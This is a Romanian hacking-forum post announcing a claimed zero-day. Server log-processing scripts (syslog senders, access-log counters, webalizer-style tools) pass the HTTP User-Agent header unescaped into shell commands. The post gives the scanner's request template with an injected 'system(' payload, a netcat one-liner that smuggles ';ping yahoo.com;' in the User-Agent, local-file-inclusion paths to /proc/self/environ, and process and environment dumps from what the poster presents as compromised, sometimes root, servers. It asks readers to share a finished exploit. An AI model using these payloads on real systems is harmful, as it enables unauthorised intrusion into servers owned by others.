Jump to content
UstupidMF

0day sys logd,repository,awstats,rotatelogs

Recommended Posts

Posted (edited)

Asa,de vreo 2 saptamani ma tot chinui cu cgiscanul meu si cu lfi-urile,mi-am pus la misto in sprintf(get,"GET %s%s HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ystem(\'cd etc ... r\nHost: %s\r\nConnection: Close\r\n\r\n",dir,file,ip);

si am inceput sa dau dupa tot felu de lfi-uri,imediat ce am dat drumu la scan,am vazut ca-mi vin multe servere cu uid0 :D,foarte ciudat,m-am tot uitat prin ele,sa inteleg care-i faza,cum de-mi vin direct root

M-a bagat mai rau in ceata

6788 ? S 0:00 /realsentry/wsp/gui/interface/bin/wsp-gui -k restart

9573 ? Ss 0:00 /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php

9814 ? SN 0:00 sh -c php /realsentry/wsp/gui/core/tools_system/send_syslog.php '[bLOCKED INTERNAL][2581809048] : 2010/06/21 18:44:01 - HEADER(3): User-Agent = ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)'

asta a fost 1 bug

21130 ? S 0:01 /usr/bin/perl -w /var/log/apache2/folderize /var/log/apache2

10573 ? S 0:00 sh -c echo '74.54.0.0 - - [21/Jun/2010:19:18:59 +0200] "GET HTTP/1.1 HTTP/1.1" 400 351 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"' >> "/var/log/apache2/vhost_ip.log"sh-2.05b# sent 32, rcvd 10248

al doilea

2029 ? S 0:00 /usr/bin/perl /usr/imjm/scripts/access2msg.pl

2031 ? S 14:54 /usr/bin/perl /usr/imjm/scripts/access2msg_healthcheck.pl

2032 ? S 6:57 /usr/bin/perl /usr/imjm/scripts/access2msg_localhost.pl

2350 ? S 0:00 sh -c echo '94.199.0.0 - - [20/Jun/2010:02:39:28 +0900] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 211 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 124.110.94.18 80 983 -' >> /tmp/access_count/mon_err_log_localhost

al treilea

cat /proc/2733/cmdline

sh-cecho '74.54.0.0 - - [21/Jun/2010:23:45:22 +0900] "GET /index.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 281 "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" - -' >> /tmp/access_count/accesslog

asta m-a speriat

25977 ? SN 0:00 sh -c /bin/bash -c 'CL="0"; CT=0; for ((i=0;i<=128;i++)); do if [ -z "$(sudo mpt-status -i $i -s 2>&1 | egrep "no SCSI disks attached|mptctl")" ]; then let CT=$CT+$(sudo mpt-status -i $i -s | egrep -v "(OPTIMAL|ONLINE)" | wc -l); CL="1"; fi; done; ([ "${CL}" -eq "0" ] && echo 1) || echo ${CT}'

24728 ? D 0:08 /usr/bin/webalizer -c /var/www/web33/.configs/webalizer.conf

19858 ? Ss 0:00 /bin/bash -c /usr/share/confixx/runwebalizer.sh

am tzipat repede dupa buffer sa ma ajute si am gasit alt bug

echo -n -e "GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ';ping yahoo.com;'\r\nHost: ip atacat\r\n\r\n" |nc ip atacat 80

sigur este o vulnerabilitate care sa se lege de toate,doar ca nu sunt eu in stare s-o gasesc :D m-au zapacit de tot,daca avetzi vreo idee si vretzi mai multe detalii,lasati-mi un msg

realsentry/wsp/tools/php/php /realsentry/wsp/gui/core/parser/parser.php 1 idi1 graceful Warning: fopen(/dev/fd/0): failed to open stream: No such device or address in /realsentry/wsp/gui/core/parser/parser.php on line 12

/dev/fd/0

/realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php od[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Resuming normal operation (pid 10825) [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Security database clean up. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: No logs security found [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check disks status. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check the size of log files with no rotation configured. /bin/sh: line 6: 10825 Killed /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php

/usr/bin/perl /usr/imjm/scripts/access2msg_md.pl

/bin/sh /command/svscanboot

$outpath = "/tmp/access_count";

if( ! mkdir( $work ) ){ unlink( $pidfile ) or &logger( "WAR: Can't remove $pidfile" ); &error_exit( $@, "WAR: Can't make $work" ); } chmod( 0711, $work ); chown( "root", "pf", $work ); }

ls -all /tmp/access_count/accesslog -rw-r--r-- 1 red swing 0 Jun 22 02:57 /tmp/access_count/accesslog

2.4.21-37.EL #1 Wed Sep 7 13:35:21 EDT 2005 i686 i686 i386 GNU/Linux uid=1000(red) gid=1000(swing) groups=1000(swing) sh: no job control in this shell sh-2.05b$

Nu fiti tzarani sa tzinetzi pt voi,sper c-o sa primesc un msg cu sploitul dezvoltat :D

Credits xbuffer and me :D

[0] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php [1] => -e [2] => 7iBoxCron.Exec; ) _SERVER["argc"] => 3 _ENV["SHELL"] => /bin/sh _ENV["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin _ENV["PWD"] => /root _ENV["LANG"] => en_US.ISO-8859-15 _ENV["SHLVL"] => 1 _ENV["HOME"] => /root _ENV["LOGNAME"] => root _ENV["_"] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php

_GET["SessionProcess"] => 7iExecMain.php _GET["SessionPriority"] => High _GET["SessionId"] => a9627114cdf99d5be8547af0d51d1daa _GET["Download"] => 0 _GET["DownloadFile"] => _GET["SessionEvalstring"] => ; include_once('/opt/7i/lib/_Bin/_1a_Controller/_Controller/_controllermain.inc'); _ControllerMain('0','a9627114cdf99d5be8547af0d51d1daa','','',$_COOKIE,$_ENV,$_FILES,$_GET,$_POST,@$GLOBALS['HTTP_RAW_POST_DATA'],$_SERVER,'',''); _SERVER["SHELL"] => /bin/sh _SERVER["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Edited by UstupidMF

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...